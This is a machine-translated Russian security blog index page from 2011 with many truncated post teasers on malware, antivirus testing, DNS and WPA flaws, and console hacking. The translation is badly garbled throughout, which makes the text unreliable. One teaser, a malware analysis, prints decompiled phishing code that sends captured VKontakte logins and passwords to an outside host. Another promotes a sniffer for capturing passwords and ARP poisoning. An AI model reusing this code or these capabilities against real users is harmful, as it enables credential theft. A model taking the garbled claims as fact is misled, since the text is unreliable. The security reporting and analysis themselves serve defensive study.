1. Multiple messages in a support from users that their computers antivirus was detecting Trojans in the directory FlashGet.
2. Panic Online program Flashget.
3. The main symptoms is the appearance in the files named:
  • inapp4.exe
  • inapp5.exe
  • inapp6.exe

  • detected by Kaspersky Antivirus as:
  • Trojan-Dropper.Win32. Agent.exo
  • Dropper.Win32.Agent.ezo
  • Trojan-Downloader.Win32.Agent.kht
  • 4. No other Trojan programs through which these files can get into the system without being detected.
    5. The audit revealed that in addition to the Tr ... Читать дальше »
    Просмотров: 686 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    On the Security @ Interop - an event, it is unfairly overlooked the attention of many IS-Schnick, we could take the pilot (April) issue of the magazine C'T-Russia, which I gladly did. Now he walks on his hands the whole company.

    Found in C'T very interesting and thoughtful comparative testing of 15 antivirus programs. Hands reached finally to "treatment" of this very "tasty" content. I will cite here only the introductory part of the methodology and conclusions. That is what is exactly that will be a comprehensive analysis on which the recently fashionable (and now you can) to scold or praise products of different vendors.

    I think that the team of the new magazine on computer technology as an integrated test - this is a great application for the leadership, because tests are not worse than those that conducts Neil Rubenking of PC Magazine USA. Now there's something to read and Russia - made their own hands testing, human language is described and fairly submitted that tog ... Читать дальше »
    Просмотров: 546 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Just two publications have attracted my attention today. And let one already for April 30 but who now reads the CW?

    So, "an outpost against viruses" by special correspondent of open systems in St. Petersburg, Dmitry Zhelvitsky, and "Interview with Mikhail Penkovsky, commercial director of Agnitum" on his beloved I anti- Malvar.

    What's worth mentioning? Announce Anti-Virus Agnitum passed without a press pump, "The official presentation of new items happened after the first month of its sales through the Internet and in conjunction with the release of a boxed product." The cost of annual license - 499 rubles, while "Agnitum ready to raise the price, if asked to do distributors. This applies to both Russian and foreign-language versions. "



    Agnitum promotion decisions in Russia ... and abroad is very different. In western countries ... Agnitum has resorted to the tactic of incentives installations through distribution to all registered users of Outpost free Eng ... Читать дальше »
    Просмотров: 617 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)



    The domain name chronopay.com, the theft of which the company ChronoPay (owner of an online processing system with the same title) became known on Monday, returned to the rightful owner. If someone does not know - was recently a post about Chronopay and it was reported that the hacked database, but this was not the case - only the domain was hijacked.

    Now chronopay.com site is under the control of the company ChronoPay. Domain chronopay.com was returned to the registrar directNIC Thursday 12/30/2010 (attackers stole the domain chronopay.com, immediately changed the company, domain registrar to another, namely - Network Solutions).

    At the moment website ChronoPay at chronopay.com available. Current status of the domain in the internal system logger - «high security transfer prohibited». This means that the registrar directNIC take special measures to ensure the safety domain.

    To date, performance site ChronoPay fully restored. Operative in this situation, th ... Читать дальше »
    Просмотров: 602 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    By activity in different own projects I have to study both win / web-programming and design, 3d-animation, the administration of their servers. And, using webmoney, surf, rock Keys to dangerous sites, to set and test various dubious software, etc. Very often connect to a computer all sorts of new devices.

    If you do it all in one install wind, sooner or later it otupeet and have to reinstall all over again. You can also pick up a messy some troyanchika or a virus (although in my case is very unlikely).

    Against the background of the general paranoia of it-security found for himself the perfect solution - the use of different virtual machines for each specific range of tasks.

    As I have done:
    1. Put on VMWare XP, freewheeling, SP3, and put the Far Office - it is a necessary minimum for almost every problem
    2. For the first machine made linked-clones (new machine refers to the first, as the base) to surf (and test sites in different browsers in the configuration ... Читать дальше »
    Просмотров: 644 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Guru cryptography, developer ciphers Blowfish and Twofish, Bruce Schneier in his blog discusses the interesting topic: why, with all the mistrust of the documents transmitted by e-mail, many organizations rely on signatures to a fax? It's the strangest thing that you can only imagine. Indeed, to forge them there is no difficulty: it is enough to cut one piece of paper, pasted on the other - and send it by fax. You do not need anything except scissors and glue. Can handle even a child. Faxes are so poorly protected against forgery, that if you think - it is strange that in our time, someone generally accepts them.

    Bruce Schneier says that he repeatedly sent by fax various documents, including contracts for the book, bank documents on the credit card authorization, non-disclosure agreement, etc. "It's amazing how organizations sometimes tend to perceive as verified these low-quality, neverifitsirovannye scans, which are transmitted over public communication lines, if they flatly r ... Читать дальше »
    Просмотров: 874 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    ESET NOD32 was the 50 th certified VB100% British magazine Virus Bulletin, almost silver wedding dearly love each other's spouses, and Advanced + from the Austrian lab of Andreas Clementi AV-Comparatives - and all three days ...

    Frankly, the speed with which reach the community sector news, sometimes leaves much to be desired. Actually, because the post is strictly do not judge.



    And meanwhile, on May 31, four days ago, published the results of laboratory tests by Andreas Clementi, a little later came the report about the regular testing of antivirus software magazine Virus Bulletin.

    Certificate VB100% this time were given anti-virus, which showed a medium Ubuntu Linux 8.04LTS Server Edition (linuksoidov dancing with a tambourine) 100% Detect viriya in conjunction with zero at Folsom known clean files.

    More details here Results of retrospective testing Clementi available on this link.

    Are repeated until both ... Читать дальше »
    Просмотров: 695 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Security experts draw attention to one of the most familiar and natural functions of your browser: information on the visited link in your browser. As you know, after visiting the link, and reload the page link to change color. So, this information can be easily removed using a special script. The danger of such an attack is often underestimated.

    The site owner can easily see which links you have visited before. To this end, he may even specifically to introduce an invisible link on the page, removing information script. For example, it can check whether you went to the competitor's site, note this fact in cookies and even a change to your site content accordingly. Of course, this is a clear violation of privacy. And the more uncomfortable to know that private information about you is so easy anyone can learn. Mozilla developers have paid attention to this danger in 2002, but not figured out what you can do.

    Of course, there is no disputing the convenience functions for t ... Читать дальше »
    Просмотров: 588 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    All probably know that there are so many different ways to security threats. They are really quite how many of them learn reading under the cut.


    All use the link below for a sample taken when they where - that are not there to afftoru pritenzy not show

    The same article is available at the following addresses: http://forxakep.ucoz.ru/publ/3-1 -0-16
    http://forum.netall.ru/index.php?showtop ...
    http://www.inattack.ru/article/402.html

    Fishing (or phishing).

    A very broad term. Its meaning is to get from users of information (passwords, credit card numbers, etc.) or cash. This technique is not aimed at one user, but in many. For example, a letter allegedly from the technical support be sent to all known customers of any bank. The letters are usually requested to send the password to the account, supposedly because of any technical work. Despite the fact that users are warned that any such information from them, none of the workers may no ... Читать дальше »
    Просмотров: 1128 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Programmer R. Makvala (Rajendrasinh Babubhai Makwana, an Indian citizen) last week sentenced to 41 months in prison for setting "a logical bomb" on computer servers Fannie Mae. From 2006 to 2008 he worked as an admin under the contract in a data center in Maryland. As a UNIX-programmer, it serves a network of about 5000 the company's servers, and in October of 2008, was fired.

    Lead Engineer, Fannie Mae later discovered in one of the standard programs, malicious code, which should have been executed on Jan. 31, 2009 and destroy all information on all the company's servers, including data about finances, securities and mortgage loans. I was Makvala Rutaceae access to all major systems, including backups.

    The malicious code was discovered, as they say, by accident: The above specials proskrollit decided before the end of a working script and found at the end of several new lines.

    It should be noted that Fannie Mae - the largest mortgage agencies it funds over 20% of m ... Читать дальше »
    Просмотров: 552 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    The Washington Post published a very interesting article on the use of high-tech employees of the terrorist organization Al Qaeda. It is not just about the most modern computer equipment, laptops, Sony, digital cameras and reception of cryptography using PGP, but also about the unique methods of online promotion. Some of them are know-how in the field of hacking social networking sites. In fact, Al-Qaida sees the Western society, living in dense information field, as one big, tightly bound, a social network and skillfully manipulates it through a carefully thought-out actions, including the use of YouTube, Wikipedia and so on.

    A good example manipulation - the action of one of the leaders of the organization, Ayman Zawahiri, head of Americans who give $ 25 million is not known where he was hiding, Ayman, but he regularly gives on-line interviews and answers to questions that he sent over the Internet. After the start of this campaign in December last year received the 1888 suici ... Читать дальше »
    Просмотров: 596 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Wired Magazine reports held last Thursday in the U.S. House of Representatives hearing on the future of the most ambitious project in modern history, the surveillance of potential terrorists. The so-called Analytical Center of the National Security (NSBAC or, more often, NSAC) has not received further funding from the Parliament in the amount of $ 11 million, which is very much hoped it created the FBI. Center - the ideological successor pretty sensational in autumn 2002 the program "Total Information Awareness» (TIA, the logo on the left), whose aim was to collect personal information about virtually all the inhabitants of the planet in real time.

    After several weeks after its inception, TIA has become a prime target for attacks opponents gain intelligence agencies inside the country. Its chief ideologue, a retired admiral and a veteran of Naval Intelligence, John Poindexter (John Poindexter), during his long career had time to earn a reputation as an uncompromising and resolut ... Читать дальше »
    Просмотров: 598 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    B protocol DNS was discovered almost used hole. Not in any particular client, but the protocol itself. And it is known there had been a long time ago, but all the "experts" agree on the fact that "well, in theory, this is - maybe a problem, but in practice it can not be used." But not so long ago, invented a way to practical use "cache poisoning" - and it has upset all the cards. It seems that it is - another test of the strength of the Internet: it is planned "largest synchronized security update in the history of the Internet", which would have involved dozens of vendors (which is not so scary), and hundreds and thousands of ISP (but this is terrible - many of them very carelessly refers to updating the software on servers).

    The information presently in the public domain a bit. There is an interview with the man who discovered the vulnerability, there is a site where you can check out - whether your computer is vulnerable DNS or not (in fact, of course, will be tested n ... Читать дальше »
    Просмотров: 627 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    The company Check Point Software Technologies, producer of the popular firewall ZoneAlarm, reported that many users of the firewall had been completely cut off from the Internet after installing the latest patch in the Microsoft Update. This patch closes a hole associated with a serious vulnerability in the protocol DNS, on which it became known two days ago.

    A vulnerability in the DNS protocol has been so severe, that lifted her to the ears of all security professionals related to Internet technologies. If not urgently patched DNS-server on the Internet (and they still nepropatcheny), the hypothetical attacker, DNS-changing table can easily redirect the request to any server on any other server (for example, all mail user can be redirected to the attacker's site and from there to the addressee), and is completely transparent to the user. True, over the past couple of days until the attackers but did not have time to react to the discovery of new holes (they are certainly workin ... Читать дальше »
    Просмотров: 556 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Kaspersky Lab, a leading manufacturer of security systems from malicious and unwanted software, hacker attacks and spam, has detected a malicious program that infects audio format WMA. The purpose of infection is to download a Trojan that allows an attacker to gain control over the user's computer.

    The worm, named Worm.Win32.GetCodec.a, convert mp3-files to WMA (while maintaining the extension mp3), and add a marker containing a link to an infected web-page. Activation marker is performed automatically while listening to the file and invokes the browser Internet Explorer, which goes on an infected page where the user is prompted to download and install a file disguised as a codec. If the user agrees to install, then on his computer downloaded a Trojan Trojan-Proxy.Win32.Agent.arp, through which an attacker can gain control of the attacked PC.

    Prior to this WMA file format used by Trojans only as a disguise, that is, an infected object is not a music file. The peculiarity ... Читать дальше »
    Просмотров: 554 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    I'm sure many of you have noticed the story of the passwords on bestpersons.ru. Invite them and other authors of web services to the debate.

    The question is whether it was Bestpersons generally have a password to access the site (which, in general, and increases)? No matter how hard you try, you still keep passwords properly is unlikely to succeed.

    Each time you offer the user to save the password (if new, to log on to your site or passwords from third-party service) - you take a very serious commitment to the security of this password. Some refer to this carelessly, some worse - but the problem is still possible, as happened with the resource being discussed.

    All this fuss with passwords like some Intense desire to keep the house with bags of (foreign) cash. And it also knows that no matter which door - whether wood, steel is, even if the shotgun house store - still to come and rob. Do not reliable yet keep them in banks that offer money back anyway?


    Th ... Читать дальше »
    Просмотров: 547 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Pwnie - analogue of the Oscars for the world of information security. Great achievements and failures, and, of course, a lot of fun. The second annual award Ponni will be held in August 2008 in Las Vegas at the meeting BlackHat USA.

    In 2008, 9 nominations:

    - For the best server bug (Pwnie for Best Server-Side Bug)
    - For the best client bug (Pwnie for Best Client-Side Bug)
    - For the mass use (Pwnie for Mass 0wnage)
    - For the most innovative development (Pwnie for Most Innovative Research)
    - For the most incompetent vendorskoe statement (Pwnie for Lamest Vendor Response)
    - For the best-known bug (Pwnie for Most Overhyped Bug)
    - For the best soundtrack (Pwnie for Best Song)
    - For an epic failure (Pwnie for Most Epic FAIL)
    - Lifetime Achievement (Pwnie for Lifetime Achievement)


    1. Nomination for Best Server bug
    Awarded to the person who discov ... Читать дальше »
    Просмотров: 742 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Today I received a message from one of his friends, his text read as follows:

    Ppivetik, Denic. Smotpi kakoy chat vkontakte - vkontakte.ru / apps.php? Act = s & id = 236634 &.... Zaxodi ckopee to me In very ponpavilcya! Kycha impressions is pepepolnen-nedoctupen)))
    message would take in trash, but the last sentence was concerned about - just so do not write.
    Decided to see what a piece of fruit ...

    Passed by reference, see the usual fleshevoy application, it looks like this:



    After entering all the data form of throws that IM is overloaded.
    Of course, wondered what gesture while it performs, for that I downloaded myself swf-files and fed him Swf Decompiler'u. After cutting it turned out that the passes and soap to fly POST'om http://ckrack.peoplego.ru/save.php:

    1. var my_lv = new LoadVars ();
    2. var result_lv = new LoadVars () ;
    3. my_lv.login_v = _root.login_txt.text;
    4. my_lv.password_v = _root.password_txt.t ... Читать дальше »
    Просмотров: 698 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    It seems that Amazon Web Services (AWS) in the right hands can be a very powerful tool to crack the most secure wireless networking. Basically, it's obvious, but the other day on network security expert named Thomas Roth at the Black Hat conference, presented the public he created the software, "sharpened" by Amazon Web Services, intended to crack protected WiFi-networks. By the way, a secure WiFi network WPA-PSK with a neighboring company Tom's organization was broken to them in 20 minutes.

    Leased by Tom Power on AWS and Services Elastic Compute Cloud helped Tom Roth access to several secure wireless networks, by identifying the key. According to the developer, the performance of its leased facilities at AWS allowed to touch about 400,000 passwords per second. All this, according to Tom, jeopardizing the safety of wireless networks as separate companies, and home users.

    Up to Tom Roth, several experts on network security have worked with Amazon EC2 to demonstrate a varie ... Читать дальше »
    Просмотров: 594 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Consider the latest malware, which is actively promoted by virtually all known methods. Starting from bringing in fake-resource with sploitov, ending the seizure of accounts and send messages with a relatively sound social engineering.



    Source

    Today, many have received messages from my friends on icq about next sozherzhaniya:
    hello. hxxp: / / feels-energy.com /*****/ - look, a cool thing!
    Encoded link: aHR0cDovL2ZlZWxzLWVuZXJneS5jb20vMDczNzMv ==

    The link can be found made out a page by uploading a clip. Here and reviewers have downloaded, and the number of downloads, in general, everything that happens normally. He even explicitly states that the video format SCR (screen saver), almost surely indicates the scope, etc. The reference in the context leads to a zip-file size ~ 81Kb.

    Focused on the Russian-speaking users.

    Contents

    Inside the archive is SCR-file size is 100Kb. Icon taken from WMPlayer'a.

    Development ... Читать дальше »
    Просмотров: 677 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Inspired by harbatopikom [Fresh malware] History of Feels-Energy.com

    Where to send the infected file, if after checking on the part of the antivirus Virus Total silent?
    Address list under the cut - just copy them in the To:

    analyse@ikarus.at;
    analysis@norman.no;
    Antivir@dials.ru;
    avsubmit@submit.microsoft.com;
    avsubmit@symantec.com;
    cat@vsnl.com;
    esafe.virus @ eAladdin.com;
    hauri98@hauri.co. kr;
    heuristik@antivir.de;
    ipevirus@vet.com.au;
    newvirus@anti-virus.by;
    newvirus@kaspersky.com;
    samples@eset.com;
    samples@sophos.com;
    submit@diamondcs.com.au;
    submit@emsisoft.com;
    submit@ewido.net;
    submit@misec.net;
    submit@simplysup.com;
    submitvirus@fortinet.com;
    support@nsclean.com;
    v3sos@ahnlab.com;
    virsample@pspl.com;
    virus@arcabit.com;
    virus@asw.cz;
    virus@avast.com;
    virus@avira.com;
    virus@ca.com;
    virus@commandcom.com;
    virus@grisoft.cz;
    virus@virusbuster.hu;
    virus_docto ... Читать дальше »
    Просмотров: 1064 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (1)

    Leading the popular transfer channel Discovery «Mythbusters» (Mythbusters) at the center of unpleasant history, a couple of days has captured the minds of conspiracy around the world. At week's leaked video recording of Adam Savage (Adam Savage) at the July conference Last HOPE, held in New York. Before an audience of several thousand people, he said that long-awaited release of the program, devoted to debunking the myth of nevzlamyvaemosti card contactless payment, and not aired because of the pressure exerted on the channel American Express, Visa and Texas Instruments.

    About his reluctance to watch a live brief instructions to bypass security RFID-card the above mentioned companies allegedly said during the teleconference, which gathered at the request of TI "destroyers." On the part of TV was involved colleague Adam Grant Imahara (Grant Imahara).

    After the story received widespread representatives of Texas Instruments (one of the leaders in the direction RFID) to give ... Читать дальше »
    Просмотров: 627 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    I have noticed that Habre and generally in this same web, Habr containing many confuse these abbreviations and carry all in a heap, therefore, sometimes there are pearls of the discharge type is better - MD5 or RSA »,« encryption using SHA »or program uses powerful encryption algorithms based on 3DES or RSA »(the latest just want to add that" a strong encryption algorithm based on N »can really only make sense if these algorithms are used correctly).

    In fact, these algorithms can be divided into the following groups:



    1. Hash algorithms (digest - algorithms) - are used to calculate a unique message ID of a fixed length, such as: 128-bit (MD5), 160 bits (SHA1, RIPEMD-160, etc) and more. Have the property that the various reports correspond to the (very likely, because after all the space of possible messages is much more fixed 160bit) different hashes, and the generation of messages with a given advance hash (or message on the hash) is very complex in terms of time ... Читать дальше »
    Просмотров: 588 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    iPhone is watching you.

    Yesterday, a well-known hacker Jonathan [NerveGas] Zdzyarski (Jonathan Zdziarski) conducted a 45-minute webcast devoted to cracking the password protection in the iPhone 3G (if you're not watching it live, then after a few days will be posted record). However, the "leaky" protect iPhone even know the general public, and has long created special programs to facilitate the process, so that the most interesting is another.

    During the presentation Zdzyarski explained that the iPhone, it turns constantly makes screenshots and stores them. removed and the text of the e-mail and IM-pager window and everything else that was an unhappy coincidence, on the screen when you click "Home". This is done exclusively with the aesthetic goals. When a user clicks on the click "Home", then the current window must be nice wrinkle and fade from the screen. This is a screenshot.

    Although the iPhone deletes the previous screenshot every time you do next, but to res ... Читать дальше »
    Просмотров: 557 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)



    Unpleasant surprise for the New Year prepared for their users well-known free email service Windows Live Hotmail by Microsoft. According to publications such sources as the BBC and The Associated Press, some Hotmail users posted on forums and blogs reported that on January 1 of their email accounts have been completely removed without warning. However, the ability to log remained, except that the inbox, sent and deleted messages were empty.

    Two days of panic Hotmail users no concrete response from Microsoft has not yet been received, therefore, is not known whether the postal service attacked by hackers, or it tricks very Microsoft. However, the spokesman for Microsoft Catherine Brooker said yesterday that it was a problem a few users of Hotmail. The only thing that the public media - is furious Comments postal service. Cath Baxter, has created a group on Facebook about the messages were missing from the box says: "I only received one comment from Microsoft, which ... Читать дальше »
    Просмотров: 607 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Google AdSense has long recognized the potential danger to users. In confirmation
    this - positive advertising resources that can harm your computer.
    Especially frustrating when your site is intended for the safety of users and advertising Google AdSense can make the switch the user to malicious websites.

    I always watch over the purity of ads and block suspicious links to the shows.
    An example is the pseudo-ads antispyware MAXantiSPY: «And you are not infected with SpyWare? Spyware-an extremely dangerous type of virus. Free checking SpyWare ... », in which an inexperienced user must pass, intrigued by a warning about the threat, and certainly it will download a malicious file.

    Or advertising pseudo-antispyware ASWPro: «Secure Anti 15rub. Free checking and protection from dangerous viruses. " To download ASWPro also calculated recently appeared advertising that appear when you request" free antivirus "," free spyware ", etc.: " We know when you d ... Читать дальше »
    Просмотров: 683 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Graduates of the Massachusetts Institute of Technology (MIT) from the company Verdasys offered original, in their view, a method of protecting sensitive information on your PC from various trudnoobnaruzhimyh trojans, keyloggers, sniffers and other such devilry. The method is to use their own tools package, which "zapolzet" in the system deeper than any malicious program and will be able to hold a secure channel of communication, even when the computer is hopelessly infected.

    Package SiteTrust Verdasys intends to distribute OEM-channels. For example, with a suite of software, which provide their customers with banks. In this case, the moment when a client comes to the page of your account in the system of internet banking, SiteTrust starts up a browser, a process under its control, separating the important from the other transaction data streams. All user input SiteTrust shoots directly from the keyboard and encrypts.

    The current version SiteTrust only works on Windows wit ... Читать дальше »
    Просмотров: 558 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Nothing foretold disaster, users holding a little work and did not know the grief, until suddenly one of the machines are not, and immediately swore not dead node, then on the other, in the third. Of the department learned of the situation only a couple of days, and the fire was underway in all.
    The servers (where antivirus was otkolochen for performance reasons), there were hundreds of infected exe files, and contagion has spread across all departments.

    Classic Start? Yes, that's just the usual in such cases, a three-day Abraham did not help. For two weeks the server being infected, none of the antivirus software installed on them can not catch the time of infection rassharennye exe files that you want and then run the users. That is, they are sort of like, but only when it is too late and the infection back to the cured machines where the antivirus is not helping.

    Virus sality (sector.12)
    description of what he does (like one of the most detailed on the network) ... Читать дальше »
    Просмотров: 2215 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (17)

    The products of the new line of Kaspersky Lab - Kaspersky Internet Security 2009 and Kaspersky Anti-Virus 2009 - implemented new functionality for collecting statistics about new threats, their source and developing ways to neutralize them.

    Using Kaspersky Security Network involves sending Kaspersky Lab the following information:

    * A unique identifier assigned to your computer. This ID describes the hardware settings of your computer and does not contain any Personal details.
    * Information about the threats detected by application components. Composition of the information depends on the type of threat detected.
    * System Information: OS version, installed service packs, downloads, services and drivers, browsers and email clients, browser extensions, the version number of the installed application from Kaspersky Lab.

    As part of Kaspersky Security Network also collects extended statistics, which inc ... Читать дальше »
    Просмотров: 594 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    List of changes can be found on the official website - intercepter.nerf.ru

    [0x4553-Intercepter] allows you to:

    # Capture the passwords of the following types: ICQ \ IRC \ AIM \ ftp \ IMAP \ POP3 \ SMTP \ LDAP \ BNC \ SOCKS \ HTTP \ WWW \ NNTP \ CVS \ TELNET \ MRA \ DC + + \ VNC \ MySql \ Oracle
    # intercept messages of IM systems such as: ICQ \ AIM \ JABBER \ YAHOO \ MSN \ GADU-GADU \ IRC \ MRA
    # Change the MAC address of network cards.
    # View traffic in raw form, with the possibility of filtration.
    # Special eXtreme mode to capture data on non-specific ports.
    # Store packets in pcap file format and perform offline analysis of dumps.
    # Remote analysis of the traffic through RPCAP demon.
    # Built ARP poison.
    # Intercept and save in eml format POP3SMTP messages.

    Works on Windows 9xNT (2KXP2k3Vista).

    Details of the program described in t ... Читать дальше »
    Просмотров: 1197 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (1)

    Introduction


    Everyone knows that the transmission of information via communication channels, it can be distorted, that is, an error may occur in the transmitted message. Misrepresentation may occur for various reasons: because of problems in transmitting or receiving equipment, interference in the communication channel from external sources or because of his injury. In order to protect the information using various methods, however, the best known and most convenient is the use of error-correcting coding information, that is, coding, controlling and correcting errors.


    History of error-correcting coding


    History of the coding supervisory errors that began in 1948 with the publication of Claude Shannon's famous article "A Mathematical Theory of Communication." Shannon showed that with each channel is connected is measured in bits per second and is called the bandwidth number C. If required by the communication system data transfer rate R ( ... Читать дальше »
    Просмотров: 757 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Very clever option keylogger implemented laboratory staff security and cryptography at Polytechnic Institute of Lausanne (Ecole Polytechnique Federale de Lausanne). They created the method is able to recognize key presses by the remote scanning of EMR from PS / 2 port, USB-port or laptop keyboard with a subsequent analysis of the signal frequency. The fact is that when you press each key generated electromagnetic pulse with unique characteristics. You can take it off right from the port, and subsequently decrypted.



    The work of the researchers mentioned four different scanning method, some of whom work at a distance of 20 meters.

    During the experiments, the Swiss experts have tested 11 different models of keyboards that connect to the system unit via USB and PS / 2. They were all vulnerable to at least one method of remote scanning even when prowhisper through a wall from an adjoining room (video can be viewed at the link above for screenshots habrakatom).

    ... Читать дальше »
    Просмотров: 641 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Every game console trying to break. Try to break the enthusiasts who want to start her own hand-written code in all the most secure modes. Try to break the enthusiasts who want to "run game backups on it (or if in Russian - to engage in piracy). Try to break the enthusiasts who want to put Linux and also an end in itself, be used more extensively than would a manufacturer of consoles (because money is made primarily on the games console itself is sold with a minimum charge, and even in minus the manufacturer).
    The vast majority of enthusiasts to do it.

    This was taken the most interesting part of hacking the Xbox 360 - code execution is not signed by MS.


    Hacking for piracy


    Two years ago, Xbox360 broke for piracy, that is, learned how to run copies of licensed games, recorded on discs. The details, I just wrote here. In short, the license disk entirely determined firmware DVD-ROM and most xbox tsifirku passed only one - a good drive or not. If you alter ... Читать дальше »
    Просмотров: 1530 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (7)

    Not so long ago affair between the two researchers managed to crack the part of the Wi-Fi Protected Access (WPA) - for those who do not know - is a protocol data encryption for wireless networks.
    For about 15 minutes Tyuz Eric and Martin Beck opened the Temporal Key Integrity Protocol and demonstrated clearly the interception of information transmitted in both directions, and open reading. Plus it is also possible to modify the headers and fake packets received by the user.
    In essence, technology is an overload of the channel large amounts of information that allows us to apply a formula developed by a pair of programmers to crack the security key.
    Wired Equivalent Privacy (WEP) - part of the WPA, an algorithm to ensure security in networks, IEEE 802.11, has long been considered obsolete because it was developed in the mid-90's. In fact, by using special software, which is elementary to find on the Internet in the public domain, this algorithm breaks down at times.
    In tu ... Читать дальше »
    Просмотров: 733 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    November 3 Microsoft published the fifth edition of the report Security Intelligence Report (SIR). In it the company talked about how she sees the evolution of the ecosystem threats "Computer Security for the first half of 2008. Recent trends noted in the report - front attack transfer to a higher level of OS kernel to applications, the final victory of trojans, adware and the like in the nomination "The main threat of our time," and, of course, a big jump in food safety most Microsoft.

    In order to separate fact from marketing, already 4 November our people (Bukasa) at the TechEd conference in Barcelona drew information from Winnie Galotti (Vinny Gullotto, left), general manager of Microsoft Malware Protection Center and leader of the work on SIR. I must say that much of it told the volunteer. And it was interesting.

    Information for reports Microsoft gets from millions of computers around the world (10 million in Russia alone), which established the utility MSRT, Windows ... Читать дальше »
    Просмотров: 591 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    As a general rule, employees of manufacturing companies said that they tend to exaggerate the real dangers that would improve their own sales. Of course, it happens, though, in general, among professionals such behavior is considered at least unethical. Say, the (ISC)? Code Of Ethics, which must be followed by professionals CISSP, said: "Let's reasonable, informed advice, do not make (from your buddy - approx. Interpreter) of unfounded anxiety or neobsnovannoy confidence." As already shown, specialists in information security is sometimes violate the canon of unreasoning anxiety. But unreasonable belief is not the lesser evil.



     Recently, Alexei Lukatsky began publishing a series of articles under the title "Myths and misconceptions of information security." Some of the "myths" related to the problem of spam. Mr Lukatskii decided to dispel the myth number 5 "Spam is bad" and the myth number 6 "Spam is detrimental." Of course, the name of Alexei Lukatsky as a m ... Читать дальше »
    Просмотров: 634 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    TLS (which is the Transport Layer Security), he is formerly known as SSL (Secure Sockets Layer), is currently the de facto standard for protection of transport layer protocol of the various methods of intervention from outside. Few people do not use it, but am not sure that all is well imagine how it actually works and what features does, except the banal "as well, because it encrypts the channel between the client and the server."


    The SSL protocol developed by Netscape, to its development was to ensure the security of data transmitted by the transport layer model ISO / OSI. The latest version of the protocol - SSL 3.0 was published in 1996, and served as the basis for developing a protocol TLS, which began organizing IETF, and the result of this work was RFC 2246: The TLS protocol, version 1.0, released in 1999. At the moment, published RFC 5246: The TLS protocol, version 2.0, which extends the functionality of some of the first version, but leaving the essence unchanged. ... Читать дальше »
    Просмотров: 554 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Two days ago the site alfastrah.ru appeared the so-called "easter egg" - if you click 5-6 times on the phone number in the upper right corner in the header started playing video erotic content. Details details viral stocks described here.

    It's no secret that viral marketing is aimed at a very rapid expansion - come to the site have grown exponentially. On some forums there were warnings that when approaching the site Kaspersky swears and says that the site sits a Trojan. In a conversation with the staff of Kaspersky Lab, this information is confirmed. Thus, "viral marketing" literally turned viral. Here is some expert commentary.


    Site analysis revealed that, in addition to erotic cartoon, sitting there and the virus.




    Site analysis revealed that, in addition to erotic cartoon, sitting there and the virus. An interesting way of introduction: it is inserted gently into the center of the page. Ship that's what (the script is not even encrypted): google- ... Читать дальше »
    Просмотров: 599 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (1)

    MD6 - the hash algorithm of variable bit and developed by Professor Ronald Rivest of the Massachusetts Institute of Technology in September 2008. Designed to create a "fingerprint" or message digests of arbitrary length. It is proposed to replace the less than perfect MD5. According to the authors, the algorithm is resistant to differential cryptanalysis. MD6 is not sufficiently resistant to collisions of the first kind. Used to authenticate the published reports, by comparing the message digest to the posting. This operation is called "verification hash» (hashcheck).



    The predecessor (MD5) was established in 1991, when the frequency of conventional processors have no more than 33MHz. She was supposed to display a binary string of arbitrary length in a string of d, to be resistant to collisions, finding pre-images and to be pseudorandom.
    After her break, the American Institute of Standards and Technology (NIST), has announced a competition to create the hash fu ... Читать дальше »
    Просмотров: 615 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Inside - perhaps the most flawed phenomenon in the corporate environment. Both in direct and figurative sense. Now the corporate perimeter is protected not only and not by external perpetrators, but also, indeed, from ourselves. We look at this issue from an insider, which combines the art of stealing confidential information from the edge of the sharp blade.

    Currently the business is an "arms race": who is faster and better to offer his services, he is a leader. "Arms" in this area differ in their specificity, but the subject of "race" does not change - relevant information with the right to use it can provide its owner with a bright future and put an end to its competitors.

    How to get a "useful" information, depending on its type and infrastructure, in which it circulates, so it is difficult to classify the methods of extraction. However, there are two fundamentally different methods, which, one way or another, engaged in its collection and processing.

    Competi ... Читать дальше »
    Просмотров: 612 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    In explanation of the topic compromised WPA.
